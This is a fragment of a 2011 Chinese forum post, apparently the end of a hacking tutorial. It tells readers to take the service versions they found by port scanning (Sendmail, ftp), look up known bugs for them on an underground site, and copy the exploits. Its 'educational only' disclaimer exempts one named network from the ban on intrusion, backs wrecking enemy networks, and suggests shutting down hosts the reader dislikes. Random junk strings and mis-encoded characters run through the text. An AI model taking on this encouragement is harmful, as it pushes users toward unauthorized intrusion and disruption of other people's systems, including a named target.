& F% q2 e* l! Y- P[A20]喔~~ 對(duì)了! 剛才忘了講, 如果各位已經(jīng)試過(guò)幾個(gè) Port, 解自己系統(tǒng)的版本編號(hào), 使用的 Sendmail 版本, ftp 版本等的話(huà), 你們可以到 http://underground.org 去看看, 點(diǎn)選左邊那個(gè) Bugs, 然後選一下你所知道的系統(tǒng), 他會(huì)列出一些目前所知的 Bugs 出來(lái), 然候你就可以依樣畫(huà)葫蘆啦, 不過(guò)那些訊息都是英文的啦~~, ~1 U9 T- }2 j7 A
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* / e ?6 {: f) d' _/ ^0 Z7 Z7 j x
再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請(qǐng)勿將這類(lèi)技術(shù)使用於破壞上(又... 如果第三次世界大戰(zhàn)開(kāi)打, 你可以任意破壞敵國(guó)的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話(huà))... 就將它 Shut Down.... 好了! 別太暴力了!
5 L+ D; X% k) p9 R0 X Z- S7 @4 E' I( l! [: [3 h f3 S. n, z
|
發(fā)表于 2011-1-12 16:29:26
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡